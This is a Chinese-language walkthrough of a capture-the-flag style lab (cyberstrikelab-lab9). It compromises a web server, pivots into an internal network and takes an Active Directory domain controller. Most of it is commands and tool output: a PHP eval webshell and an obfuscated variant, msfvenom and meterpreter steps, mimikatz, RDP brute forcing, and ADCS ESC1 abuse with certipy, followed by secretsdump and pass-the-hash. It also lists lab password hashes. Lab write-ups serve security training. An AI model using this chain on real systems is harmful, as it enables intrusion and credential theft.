cyberstrikelab-lab9
第一台
web 172.5.33.6
sql的payload
http://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5
a66abb5684c45962d887564f08346e8d 解密 admin123456
从robots.txt中发现admin地址,登录管理员账号
在这里发现了html模板中包含了php代码
在模板管理中修改index.html
<?php @eval($_POST['a']);?>
一句话还是连不上的,尝试另一种马,好像也没有其他方法能打进去了,网上找了十多种写法的马,就这种有效
<?php
function simpleTransform($str, $offset = 1) {
$transformed = '';
for ($i = 0; $i < strlen($str); $i++) {
$transformed .= chr((ord($str[$i]) + $offset) % 256);
}
return $transformed;
}
$original = $_REQUEST["a"];
$transformed = simpleTransform($original, 3);
function reverseTransform($str, $offset = 1) {
$reversed = '';
for ($i = 0; $i < strlen($str); $i++) {
$reversed .= chr((ord($str[$i]) - $offset + 256) % 256);
}
return $reversed;
}
$reversed = reverseTransform($transformed, 3);
echo eval($reversed);
蚁剑连接
生马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
上线
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/bind_tcp; set RHOST 172.5.33.6; set LPORT 4444; exploit -j -z"
提权,上传fscan
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe
查ip,扫内网
C:\phpstudy_pro\WWW>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ��̫��ʵ�� 1:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3f:d815:5529:b836%11
IPv4 Address. . . . . . . . . . . : 172.5.33.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.5.33.233
Ethernet adapter ��̫��ʵ�� 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::c133:dd94:56a9:bdcc%2
IPv4 Address. . . . . . . . . . . : 10.6.6.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.6.6.1
Tunnel adapter isatap.{730545FA-7DC0-4716-8AF2-678FFC6D1F1C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.{E6E2FD25-6949-4C86-A749-7F0F14616295}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.10/24
fscan.exe -h 10.6.6.10/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.6.6.10 is alive
(icmp) Target 10.6.6.55 is alive
(icmp) Target 10.6.6.88 is alive
[*] Icmp alive hosts len is: 3
10.6.6.55:88 open
10.6.6.10:3306 open
10.6.6.88:445 open
10.6.6.55:445 open
10.6.6.10:445 open
10.6.6.88:139 open
10.6.6.55:139 open
10.6.6.10:139 open
10.6.6.88:135 open
10.6.6.55:135 open
10.6.6.10:135 open
10.6.6.55:80 open
10.6.6.10:80 open
[*] alive ports len is: 13
start vulscan
[+] NetInfo:
[*]10.6.6.10
[->]WIN-784BAKDI0AC
[->]172.5.33.6
[->]10.6.6.10
[+] NetInfo:
[*]10.6.6.55
[->]DC
[->]10.6.6.55
[+] NetInfo:
[*]10.6.6.88
[->]cyberweb
[->]10.6.6.88
[*] WebTitle:http://10.6.6.10 code:200 len:0 title:None
[*] 10.6.6.55 [+]DC __MSBROWSE__\DC Windows Server 2016 Standard 14393
[*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393
[*] 10.6.6.88 (Windows Server 2016 Standard 14393)
[*] 10.6.6.55 (Windows Server 2016 Standard 14393)
[*] WebTitle:http://10.6.6.55 code:200 len:703 title:IIS Windows Server
[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect
已完成 13/13
[*] 扫描结束,耗时: 1m8.3819491s
其中10.6.6.55被识别为域控制器
10.6.6.88是域成员,主机名cyberweb,属于域CYBERSTRIKELAB
10.6.6.55: 报告了一个漏洞 poc-yaml-active-directory-certsrv-detect。这强烈暗示该服务器上运行着 Active Directory 证书服务 (AD CS),是后续攻击的关键入口。
设置路由,配置代理
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN-784BAKDI0AC (172.5.33.6)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.6.6.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 172.5.33.0/255.255.255.0 from host's routing table.
meterpreter > bg
[*] Backgrounding session 2...
msf exploit(multi/handler) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
配置系统代理配置文件proxychains4.conf
┌──(root㉿kali)-[/data/windows_atk/domain_atk]
└─# tail -n \6 /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
第二台
fscan定向扫描,端口,发现3389能进行爆破,administrator密码为qwe123!@#
C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.88 -p 1-10000
fscan.exe -h 10.6.6.88 -p 1-10000
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.6.6.88 is alive
[*] Icmp alive hosts len is: 1
10.6.6.88:445 open
10.6.6.88:139 open
10.6.6.88:135 open
10.6.6.88:3389 open
10.6.6.88:5985 open
[*] alive ports len is: 5
start vulscan
[+] NetInfo:
[*]10.6.6.88
[->]cyberweb
[->]10.6.6.88
[*] 10.6.6.88 (Windows Server 2016 Standard 14393)
[*] WebTitle:http://10.6.6.88:5985 code:404 len:315 title:Not Found
[*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393
已完成 3/5 [-] (18/210) rdp 10.6.6.88:3389 administrator administrator1 remote error: tls: access denied
已完成 4/5 [-] (36/210) rdp 10.6.6.88:3389 administrator 123456789 remote error: tls: access denied
已完成 4/5 [-] (54/210) rdp 10.6.6.88:3389 administrator Aa12345 remote error: tls: access denied
[+] RDP:10.6.6.88:3389:administrator qwe123!@#
已完成 5/5
[*] 扫描结束,耗时: 4m8.7461024s
在桌面找到第二个flag
第三台
看样子需要利用域控相关的漏洞了,永恒之蓝失败
use exploit/multi/handler
set rhost 10.6.6.88
run
共享data目录(便于传输文件),然后将正向马传上去,并执行
proxychains rdesktop 10.6.6.88 -r disk:shell=/data
提权
meterpreter > getuid
Server username: CYBERWEB\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
抓取域内hash
C:\Users\Administrator\Desktop>mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
User Name : CYBERWEB$
Domain : CYBERSTRIKELAB
NTLM : 5e0d5d7bacf2087dfd44ea47812b5165
User Name : CYBERWEB$
Domain : CYBERSTRIKELAB
NTLM : 331dcbb88d1a4847c97eab7c1c168ac8
User Name : Administrator
Domain : CYBERWEB
NTLM : c377ba8a4dd52401bc404dbe49771bbc
在这个3.bat文件中发现了一个账号密码,cslab / cs1ab@wwe
第三台:ADCS
ADCS是横向移动到域控制器的常见路径
3.1 侦察ADCS服务
之前fscan扫出来的
[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 表明可能存在AD证书服务
再次上线getsystem,获取一个系统权限的cmd,获取一下CA名字(需要提权到system),执行 certutil
名称为 cyberstrikelab-DC-CA
获取到CA名称后,我们需要确定攻击入口,并且寻找可利用的漏洞,比如ESC1漏洞
┌──(root㉿kali)-[/data/demo]
└─# proxychains certipy-ad find -u 'cslab@10.6.6.55' -password 'cs1ab@wwe' -dc-ip 10.6.6.55 -vulnerable -stdout
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:636 ... OK
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'cyberstrikelab-DC-CA' via RRP
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:445 <--socket error or timeout!
[-] Failed to connect to remote registry: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[-] Use -debug to print a stacktrace
[!] Failed to get CA configuration for 'cyberstrikelab-DC-CA' via RRP: 'NoneType' object has no attribute 'request'
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'cyberstrikelab-DC-CA'
[*] Checking web enrollment for CA 'cyberstrikelab-DC-CA' @ 'DC.cyberstrikelab.com'
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:443 ... OK
[*] Enumeration output:
Certificate Authorities
0
CA Name : cyberstrikelab-DC-CA
DNS Name : DC.cyberstrikelab.com
Certificate Subject : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
Certificate Serial Number : 652A47597C7F03824B7815EBE474E40B
Certificate Validity Start : 2025-04-22 07:45:38+00:00
Certificate Validity End : 2030-04-22 07:55:38+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Active Policy : Unknown
Disabled Extensions : Unknown
Certificate Templates
0
Template Name : DC
Display Name : DC
Certificate Authorities : cyberstrikelab-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-04-22T07:58:11+00:00
Template Last Modified : 2025-04-22T07:58:11+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CYBERSTRIKELAB.COM\Domain Users
CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Enterprise Admins
CYBERSTRIKELAB.COM\Authenticated Users
Object Control Permissions
Owner : CYBERSTRIKELAB.COM\Administrator
Full Control Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Write Owner Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Write Dacl Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Write Property Enroll : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Enterprise Admins
[+] User Enrollable Principals : CYBERSTRIKELAB.COM\Authenticated Users
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
| 参数 | 来源/原因 | 作用 |
|---|---|---|
proxychains |
之前建立的代理配置 | 让命令流量通过跳板机(10.6.6.10)进入内网 |
certipy-ad |
工具选择 | 专门用于AD证书服务攻击的工具 |
find |
子命令 | 查找证书模板和证书颁发机构(CA) |
-u 'cslab@10.6.6.55' |
从mimikatz获得 | 使用域用户cslab,@后可以是IP或域名 |
-password 'cs1ab@wwe' |
从mimikatz/3.bat获得 | cslab用户的密码 |
-dc-ip 10.6.6.55 |
fscan扫描结果 | 指定域控制器的IP地址 |
-vulnerable |
攻击目标 | 只显示存在已知漏洞的证书模板 |
-stdout |
输出选项 | 将结果输出到终端 |
从结果中看出,存在ESC1漏洞
Template Name: DC
Enabled: True
Client Authentication: True
Enrollee Supplies Subject: True # ESC1漏洞关键点
Enrollment Rights: CYBERSTRIKELAB.COM\Domain Users # cslab可申请
Vulnerabilities: ESC1
3.2 利用ESC1漏洞
3.2.1 创建机器账户(临时)
利用cslab这个域用户在目标域中创建一个新的机器账户,结果会返回一个临时用户tmpuser$和密码信息
proxychains certipy-ad -debug account create -u 'cslab@cyberstrikelab.com' -p 'cs1ab@wwe' -dc-ip 10.6.6.55 -user tmpuser -dns DC.cyberstrikelab.com
| 参数 | 来源/原因 | 作用 |
|---|---|---|
account create |
子命令 | 在域中创建新的机器账户 |
-user tmpuser |
自定义 | 创建名为tmpuser$的机器账户 |
-dns DC.cyberstrikelab.com |
从fscan结果获得 | 设置机器账户的DNS主机名 |
为什么要创建?
Machine模板限制:有些证书模板(如Machine)只允许机器账户申请
隐蔽性:避免直接使用cslab账户进行敏感操作
权限要求:机器账户可以申请更广泛的证书类型
3.2.2 以机器账户请求证书
通过新创建的机器账户 tmpuser$ 向目标域控制器(10.6.6.55)的证书颁发机构(CA)申请一个 机器证书(要多运行几次,运行一次可能成功不了)
proxychains certipy-ad req \
-u 'tmpuser$@cyberstrikelab.com' \
-p 'kQb8YIJOWcKq69w5' \
-ca 'cyberstrikelab-DC-CA' \
-target 10.6.6.55 \
-template 'Machine' \
-dc-ip 10.6.6.55
| 参数 | 来源/原因 | 作用 |
|---|---|---|
req |
子命令 | 请求证书 |
-u 'tmpuser$@...' |
上一步创建 | 使用新创建的机器账户 |
-p 'kQb8YIJOWcKq69w5' |
上一步输出 | 机器账户的密码 |
-ca 'cyberstrikelab-DC-CA' |
certipy find结果 | 证书颁发机构的名称 |
-target 10.6.6.55 |
fscan扫描结果 | CA服务器的IP地址 |
-template 'Machine' |
侦察发现 | 利用存在漏洞的模板 |
用dc.pfx 证书文件向域控制器 (10.6.6.55) 进行身份认证,却报了Kerberos时钟偏差,攻击机和域控时间是不能相差5分钟以上的
┌──(root㉿kali)-[/data/demo]
└─# proxychains certipy-ad auth -pfx dc.pfx -dc-ip 10.6.6.55
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC.cyberstrikelab.com'
[*] Using principal: 'dc$@cyberstrikelab.com'
[*] Trying to get TGT...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
3.2.3 修复Kerberos时间偏差
查询域控时间
proxychains net time -S 10.6.6.55
3.2.4 使用证书进行身份验证
修改时间参数,这样就能执行成功了
┌──(root㉿kali)-[/data/demo]
└─# faketime '2025-12-11 22:57:01' proxychains certipy-ad -debug auth -pfx dc.pfx -dc-ip 10.6.6.55
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '10.6.6.55'
[+] DC IP: '10.6.6.55'
[+] DC Host: ''
[+] Target IP: '10.6.6.55'
[+] Remote Name: '10.6.6.55'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC.cyberstrikelab.com'
[*] Using principal: 'dc$@cyberstrikelab.com'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC cyberstrikelab.com (10.6.6.55)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK
[*] Got TGT
[*] Saving credential cache to 'dc.ccache'
[+] Attempting to write data to 'dc.ccache'
[+] Data written to 'dc.ccache'
[*] Wrote credential cache to 'dc.ccache'
[*] Trying to retrieve NT hash for 'dc$'
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK
[*] Got hash for 'dc$@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa
| 参数 | 来源/原因 | 作用 |
|---|---|---|
auth |
子命令 | 使用证书进行Kerberos认证 |
-pfx dc.pfx |
上一步生成 | 包含私钥的证书文件 |
-debug |
调试选项 | 显示详细过程信息 |
认证过程:
- 证书提交:向域控(10.6.6.55)提交dc.pfx证书
- 身份验证:证书证明申请者是DC$(域控制器机器账户)
- TGT获取:成功获取DC$的Kerberos票证授予票证(TGT)
- 哈希提取:从TGT中提取DC$的NTLM哈希
3.2.5 获取NTLM哈希
用域控的机器账号 dc$ 的 NT 哈希,进行 Pass-the-Hash 身份验证,尝试从域控中提取所有域用户的凭据信息(如 NTLM 哈希等)。
┌──(root㉿kali)-[/data/demo]
└─# proxychains impacket-secretsdump cyberstrikelab.com/dc\$@10.6.6.55 -hashes aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:445 ... OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:49669 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:7e5d2858c617c4ccf32b28241dc5b8b2:::
tmpuser$:1105:aad3b435b51404eeaad3b435b51404ee:6fe8e4da8776622663eed7aba05de2f7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8583c13a9eca67e085ff0b68af74316bef0ebd3fb197bb235b76cbb72358f2ef
Administrator:aes128-cts-hmac-sha1-96:6012285d474e3b60086965219ac7e31c
Administrator:des-cbc-md5:208fc8f42fae3132
krbtgt:aes256-cts-hmac-sha1-96:0b820697b640266ced6843c4041131c1e3750000e00d47c0c597a82547927337
krbtgt:aes128-cts-hmac-sha1-96:c8f683e4cf2033fd75416667670e13bb
krbtgt:des-cbc-md5:23dc674a76bf7adc
cyberstrikelab.com\cslab:aes256-cts-hmac-sha1-96:34439b0bf9f6e1bf57d4d859215ed387a9c75e944ac053ddd1bc2f1e5b162048
cyberstrikelab.com\cslab:aes128-cts-hmac-sha1-96:84a132b5db39e2e652c08b8148fecb00
cyberstrikelab.com\cslab:des-cbc-md5:46f457ef2aad0e08
DC$:aes256-cts-hmac-sha1-96:2292c30804bdf9a61d170f48d38b30d3f843bb8310677ac7116e925f663edcbd
DC$:aes128-cts-hmac-sha1-96:b583afdc96a04ec0ceda8dffdfa2e883
DC$:des-cbc-md5:a75801e31943a2dc
CYBERWEB$:aes256-cts-hmac-sha1-96:c0418d75b0ef82607eadcd0f4793441aa17fc71df788e83a531ae87ce2cc92d9
CYBERWEB$:aes128-cts-hmac-sha1-96:3c602f53a3722c0a602a5adf2114354a
CYBERWEB$:des-cbc-md5:6d5dd3261f38c862
tmpuser$:aes256-cts-hmac-sha1-96:952c1a920206e3a5852ea56dfdde77acb8270bf12628c29a7f702a9cdc8fb081
tmpuser$:aes128-cts-hmac-sha1-96:1174b1ae9d7f4b04fd5eef81bcbd2144
tmpuser$:des-cbc-md5:795d80ec58cdd5a8
[*] Cleaning up...
| 参数 | 来源/原因 | 作用 |
|---|---|---|
impacket-secretsdump |
工具选择 | 远程提取密码哈希的工具 |
cyberstrikelab.com/dc\$@10.6.6.55 |
目标指定 | 使用dc$账户连接域控 |
-hashes ... |
上一步获得 | 提供dc$的LM和NTLM哈希 |
dc\$中的\ |
Shell转义 | 防止$被Shell解释为变量 |
3.2.6 PTH
PTH,拿下域控,在根目录获取最后的flag
┌──(root㉿kali)-[/data/demo]
└─# proxychains impacket-psexec -hashes :28cfbc91020438f2a064a63fff9871fa cyberstrikelab.com/administrator@10.6.6.55
本站小部分内容转载于互联网,如有侵权还请联系
THE END
暂无评论内容